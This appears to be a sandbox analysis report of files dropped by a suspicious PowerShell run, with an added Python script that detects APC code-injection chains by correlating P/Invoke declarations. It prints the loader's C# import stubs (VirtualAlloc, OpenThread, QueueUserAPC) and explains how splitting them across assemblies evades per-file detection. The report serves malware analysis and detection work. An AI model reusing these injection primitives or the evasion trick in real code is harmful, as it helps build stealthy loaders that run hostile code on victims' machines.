                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zsBJgtWI9giUyWgc8sqYjhsJ8fm8M4J2+bFFu+q84WsKcQIcQw02d:uITfTaUTgrsqY1RJE/Kkw02d
                                    MD5:006D1060A3B9C817E7E32CB0AF1113C6
                                    SHA1:CFCD05DD725D3B3A012AA6B830FFFA42A5DE845F
                                    SHA-256:7E5D75DCDDC63D8A2A43DF40F87B4DFF54B75B4B540EEF13721B21D7515DD827
                                    SHA-512:47A39188FD3CAB32D8680AF4D51CD41AE5FDE78AE7062DAC07B97A243AF86C27CF403F9EA8FBE614F7A0FDB6521BDF745AFECF7307E1E3E06C5999ACE88511AB
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483823" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8352
                                    Entropy (8bit):3.69147029511001
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNivo6Fu6Yo8SURqzpagmfHSsmdCpNA89bKX1f0GOm:RrlsNiw6s6YDSU4zpagmfHSsmuKlfj
                                    MD5:E368C3045276EBF134B315BD5D8EF7DB
                                    SHA1:A436C80D93157A854DB88E7E2F7D38BF3126786B
                                    SHA-256:535294B083E9C5C219F8866B8FA1F7A6FFB849E2BDEB4C016378FEA28312BD48
                                    SHA-512:2947061FBE9446DE17EC165FEE2B329C1F689A520F972AD982B4C84064246CE6986A509137CBF2130AB5237148E6D1BBE8C48789E348A087AB4E683CC2BF8BBF
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.0.<./.P.i.d.>.......
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4665
                                    Entropy (8bit):4.429165137940979
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zs/iJgtWI9giUyWgc8sqYjhE8fm8M4J2+AFXy+q8vQ+9KcQIcQw0Hd:uITfIaUTgrsqY1pJIyKpKkw0Hd
                                    MD5:94ECB0DA39C39AB28AA13B51A4DB3BB8
                                    SHA1:39A6B932C82740AE346C82E2AE9DF7845314111C
                                    SHA-256:78AFEE5C62B29D412B5C91DB1263E2EB057968688F7FA4D308AB8336A0D8D078
                                    SHA-512:B76C30F4C6740FE12A21D863AB68E7B35DB2C6890B30DD9F64911A8EC0E670208D0E4FAE058C742DAF8F8AFD19862B74221826D3FCE95EA0A48E74CA22130003
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483822" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):11606
                                    Entropy (8bit):4.883977562702998
                                    Encrypted:false
                                    SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                                    MD5:243581397F734487BD471C04FB57EA44
                                    SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                                    SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                                    SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                                    Malicious:false
                                    Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1192
                                    Entropy (8bit):5.325275554903011
                                    Encrypted:false
                                    SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                    MD5:05CF074042A017A42C1877FC5DB819AB
                                    SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                    SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                    SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                    Malicious:false
                                    Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                                    Category:dropped
                                    Size (bytes):1332
                                    Entropy (8bit):3.9920012545315475
                                    Encrypted:false
                                    SSDEEP:24:Hve6zW9NKrrOuHFhKdNII+ycuZhNtakSbPNnq92d:PSKrSuTKdu1ulta3Rq9G
                                    MD5:9DE94FD3F34A6169E6324C66FF77C906
                                    SHA1:7F571FE5F120D2E0CD51403DE13472DD1560A4AC
                                    SHA-256:97E062CCF0173420D01EC0CEEE1D77241EACA5BA6F81AA4EDC3C52032863DA23
                                    SHA-512:371F5B070E73B96CA218C25EB972D72EE668190077A90521E71D96E8EB9F1935F9544FB2B91A0B9FED40C9AFAA853B34CEA4640654EA0F33E4A94D10D2C3EA84
                                    Malicious:false
                                    Preview:L....Rcb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP....................W...F..i..a.=...........5.......C:\Users\user\AppData\Local\Temp\RES319C.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.i.1.g.j.u.u.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                                    Category:dropped
                                    Size (bytes):1332
                                    Entropy (8bit):4.00763306842418
                                    Encrypted:false
                                    SSDEEP:24:HNzW9NhhZ8xuHfQhKdNII+ycuZhNXakSZPNnq92d:Ehh2xuaKdu1ulXa3bq9G
                                    MD5:6D7A47645190CE81FA9272663BB066B9
                                    SHA1:79E7D6F114861BE379EACF2CAB653FC0E5694B21
                                    SHA-256:3D846BF40B7AE12970AFD5E48C749ACF0619045C17194DCCFDE8D8533DB9FED7
                                    SHA-512:A7D776C98716A09C1B3C86F622FBC8ACEEDFD40B3C570525CF1CE57DF8B7BA9B32766AFE8A655A08AE0E88ADF7375F5E2E4E49E5CBF2D5DA5C6E5CA760CB6E80
                                    Malicious:false
                                    Preview:L....Rcb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP..................K{=.3g..8.... "...........5.......C:\Users\user\AppData\Local\Temp\RESFC15.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.2.v.x.j.0.3.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):652
                                    Entropy (8bit):3.1053216887427664
                                    Encrypted:false
                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7YnqqbPN5Dlq5J:+RI+ycuZhNtakSbPNnqX
                                    MD5:80E5570291184688A869DEE161E23D8E
                                    SHA1:6803FA57ED622585EE8629C641C943D5303F7502
                                    SHA-256:E2600F55D8FEF33F62C87CDBC3ED97EB6833A1665918EBCCEADCD40F16B029D7
                                    SHA-512:C1B9957D45F2E7CEC4C533285B3D380AC354B677DE6B8FA2D679718010811F5D36B9D83D8EBB3A65920DC93254184AA83A9BB59A598EBE4D1F54DD67272F16AB
                                    Malicious:false
                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.i.1.g.j.u.u.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.i.1.g.j.u.u.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text
                                    Category:dropped
                                    Size (bytes):417
                                    Entropy (8bit):5.038440975503667
                                    Encrypted:false
                                    SSDEEP:6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny
                                    MD5:AE91D1351B9FB773FEF9B6F31D0A22EE
                                    SHA1:323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31
                                    SHA-256:2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD
                                    SHA-512:94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23
                                    Malicious:false
                                     Preview (line breaks restored; this is the C# source that PowerShell's Add-Type hands to csc.exe, random class and parameter names wrapped around real kernel32 exports):
                                     using System;
                                     using System.Runtime.InteropServices;

                                     namespace W32
                                     {
                                         public class omrgvusmwh
                                         {
                                             [DllImport("kernel32")]
                                             public static extern IntPtr GetCurrentProcess();
                                             [DllImport("kernel32")]
                                             public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);
                                             [DllImport("kernel32")]
                                             public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);
                                         }
                                     }
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                    Category:dropped
                                    Size (bytes):371
                                    Entropy (8bit):5.249019234797919
                                    Encrypted:false
                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fNn0zxs7+AEszI923fXH:p37Lvkmb6KzN0WZE2v
                                    MD5:F28E2C87B12035961456125647878FCE
                                    SHA1:6F55949A828C2B465A50A45C6C71FA3C01A3BDCE
                                    SHA-256:5B68794520547EA8882EBC7A84C4366A01EB2392313037DD1B2F8B0B6DFFFB30
                                    SHA-512:AA2DAC61F09E0EE93261701B2881E645FF000836C6F291E3F75773D24860217860D2A87A8B29062C31BEBEB4347DA4D474271E36AA6EA1AF911D844AADB5FAEA
                                    Malicious:false
                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.0.cs"
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3584
                                    Entropy (8bit):2.6530037012560004
                                    Encrypted:false
                                    SSDEEP:24:etGSIMWWOJy853Ek0s2E7OgkdWQzbtkZf1mOWI+ycuZhNtakSbPNnq:6Kvz5UkGE7v2WQzqJ1m11ulta3Rq
                                    MD5:E00BC379F4F3CAAAE28A855CBA000F3A
                                    SHA1:2F2AFF2B7C7AD9D1EDE37E66F7CA2F071F3DC7C1
                                    SHA-256:28E97F3EC717884B7058865891248914DA5DD87C0B88E57E321B4EC5A39C3FD0
                                    SHA-512:47394F7F97B84050693B758939C8C57DFAFEE9E11714AEC31E7A43593D92EAD5B1DE46B0581B9F1F34582BDB3C9E26246BBDE94ACABA0203201EAA5DC9E98FD7
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Rcb...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..p.............................................................(....*BSJB............v4.0.30319......l...H...#~......P...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............1.......................".............. =............ O............ W.....P ......d.........j.....v...........................d. ...d...!.d.%...d.......*.....3.D.....=.......O.......W...........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):868
                                    Entropy (8bit):5.336626837702438
                                    Encrypted:false
                                    SSDEEP:24:AId3ka6KzNVE2WKaM5DqBVKVrdFAMBJTH:Akka6arE2WKxDcVKdBJj
                                    MD5:DB810852324B71057176ED36F2CA1695
                                    SHA1:713996E9A782D6855EE1478FD42E7805D09C4A93
                                    SHA-256:5B22C0AB30D90381ADF759C4D158F834E885757D62A889E1EC714AE99875F44D
                                    SHA-512:79F2ED62FF95B48C4E1F26A2AF8845FE6BBFC0D7F69563C76E76C79C2DA3960068228164BF20AB849FC65B24298D950CB46FB36C7D83707ED812AE336AC41DBA
                                    Malicious:false
                                     Preview (line breaks restored):
                                     C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.0.cs"

                                     Microsoft (R) Visual C# Compiler version 4.7.3056.0
                                     for C# 5
                                     Copyright (C) Microsoft Corporation. All rights reserved.

                                     This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):652
                                    Entropy (8bit):3.121923247223275
                                    Encrypted:false
                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0lyak7YnqqXlTPN5Dlq5J:+RI+ycuZhNXakSZPNnqX
                                    MD5:4B7B3DAD3367B7883885AE92CC2022A8
                                    SHA1:4AB6E72835EF2BD6D9846FF139DE59289E97B3D1
                                    SHA-256:969A0F960763778F331C1CFB2FF57CA4696E3A7EDAE689A3F0BD9F40A12D3C1F
                                    SHA-512:1E8AD8BFD152023AF10B6D9A725282C1FD2CFAA6172E575B66471D6D695991B915BBF5DFB571C47E2DE640F1E8D7EB39B502B12A359A7038A8BEF90DCAE3094B
                                    Malicious:false
                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.2.v.x.j.0.3.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...f.2.v.x.j.0.3.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text
                                    Category:dropped
                                    Size (bytes):411
                                    Entropy (8bit):5.082169696837192
                                    Encrypted:false
                                    SSDEEP:6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy
                                    MD5:248E15CD19191D4333303E0E1F8E9A70
                                    SHA1:9896EF9708F81AE4E3F2CA86329AD6BD82C700C3
                                    SHA-256:0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF
                                    SHA-512:8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1
                                    Malicious:false
                                     Preview (line breaks restored; the second Add-Type source, declaring the thread-handle and APC primitives that the first source's VirtualAlloc buffer is fed into):
                                     using System;
                                     using System.Runtime.InteropServices;

                                     namespace W32
                                     {
                                         public class yifpgxqqbj
                                         {
                                             [DllImport("kernel32")]
                                             public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);
                                             [DllImport("kernel32")]
                                             public static extern IntPtr GetCurrentThreadId();
                                             [DllImport("kernel32")]
                                             public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);
                                         }
                                     }
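The two Add-Type sources dropped by powershell.exe above split one APC injection chain across two assemblies: VirtualAlloc (with GetCurrentProcess and SleepEx) in ci1gjuu1.0.cs, and OpenThread, GetCurrentThreadId and QueueUserAPC in f2vxj03f.0.cs. Each file on its own looks harmless, which is consistent with the report marking both Malicious:false. The following Python triage script is an added example, not part of the Joe Sandbox report or of the sample: it extracts P/Invoke declarations from such sources (honouring an EntryPoint= override, the usual trick for hiding the real export behind a random C# name), maps the exports to injection roles, and shows that only correlating the files from one process exposes the chain. The role table and the alloc-plus-exec rule are my assumptions; the two sample sources are the report's previews with line breaks restored.

```python
import re

# Add-Type sources as shown in the report's previews, with the '.'
# separators restored to line breaks. Class and parameter names are the
# original random identifiers, so the regex is exercised on realistic input.
CS_SOURCE_1 = '''using System;
using System.Runtime.InteropServices;

namespace W32
{
    public class omrgvusmwh
    {
        [DllImport("kernel32")]
public static extern IntPtr GetCurrentProcess();
[DllImport("kernel32")]
public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);
    }
}
'''
CS_SOURCE_2 = '''using System;
using System.Runtime.InteropServices;

namespace W32
{
    public class yifpgxqqbj
    {
        [DllImport("kernel32")]
public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);
[DllImport("kernel32")]
public static extern IntPtr GetCurrentThreadId();
[DllImport("kernel32")]
public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);
    }
}
'''

# One DllImport attribute followed by its extern declaration. EntryPoint=
# is captured so a renamed C# wrapper still resolves to the real export.
PINVOKE_RE = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"(?P<attrs>[^\]]*)\)\]\s*'
    r'(?:public\s+|private\s+|internal\s+)?static\s+extern\s+'
    r'[\w.<>\[\]]+\s+(?P<name>\w+)\s*\(',
    re.IGNORECASE)
ENTRYPOINT_RE = re.compile(r'EntryPoint\s*=\s*"(\w+)"', re.IGNORECASE)

# Assumed role table: which export serves which step of an injection chain.
ROLES = {
    "alloc":   {"virtualalloc", "virtualallocex", "ntallocatevirtualmemory"},
    "write":   {"writeprocessmemory", "ntwritevirtualmemory", "rtlmovememory"},
    "protect": {"virtualprotect", "virtualprotectex", "ntprotectvirtualmemory"},
    "handle":  {"openprocess", "openthread", "getcurrentprocess", "getcurrentthreadid"},
    "exec":    {"queueuserapc", "ntqueueapcthread", "createthread",
                "createremotethread", "ntcreatethreadex", "setthreadcontext"},
    "delay":   {"sleep", "sleepex"},
}

def extract_pinvokes(source: str) -> list:
    """Return (dll, export) pairs declared via DllImport in a C# source."""
    found = []
    for m in PINVOKE_RE.finditer(source):
        ep = ENTRYPOINT_RE.search(m.group("attrs"))
        export = ep.group(1) if ep else m.group("name")
        dll = m.group("dll").lower()
        if dll.endswith(".dll"):
            dll = dll[:-4]
        found.append((dll, export))
    return found

def roles_for(exports) -> set:
    """Map export names (any casing) onto the ROLES they play."""
    lowered = {e.lower() for e in exports}
    return {role for role, names in ROLES.items() if lowered & names}

def is_injection_chain(roles) -> bool:
    """Assumed rule: memory obtained plus control flow transferred."""
    return "alloc" in roles and "exec" in roles

def assess(sources: dict) -> dict:
    """Score each dropped source alone, then all sources of one process together."""
    per_file, combined = {}, set()
    for name, src in sources.items():
        roles = roles_for(e for _, e in extract_pinvokes(src))
        per_file[name] = {"roles": roles, "flagged": is_injection_chain(roles)}
        combined |= roles
    return {"per_file": per_file, "combined_roles": combined,
            "flagged": is_injection_chain(combined)}

if __name__ == "__main__":
    verdict = assess({"ci1gjuu1.0.cs": CS_SOURCE_1, "f2vxj03f.0.cs": CS_SOURCE_2})
    for name, info in verdict["per_file"].items():
        print(f"{name}: roles={sorted(info['roles'])} flagged={info['flagged']}")
    print(f"process-wide: roles={sorted(verdict['combined_roles'])} flagged={verdict['flagged']}")
```

The practical lesson is in `assess`: key the correlation on the parent process (here, a single powershell.exe PID compiling several assemblies), not on the individual dropped file, or the chain is never seen whole.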
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                    Category:dropped
                                    Size (bytes):371
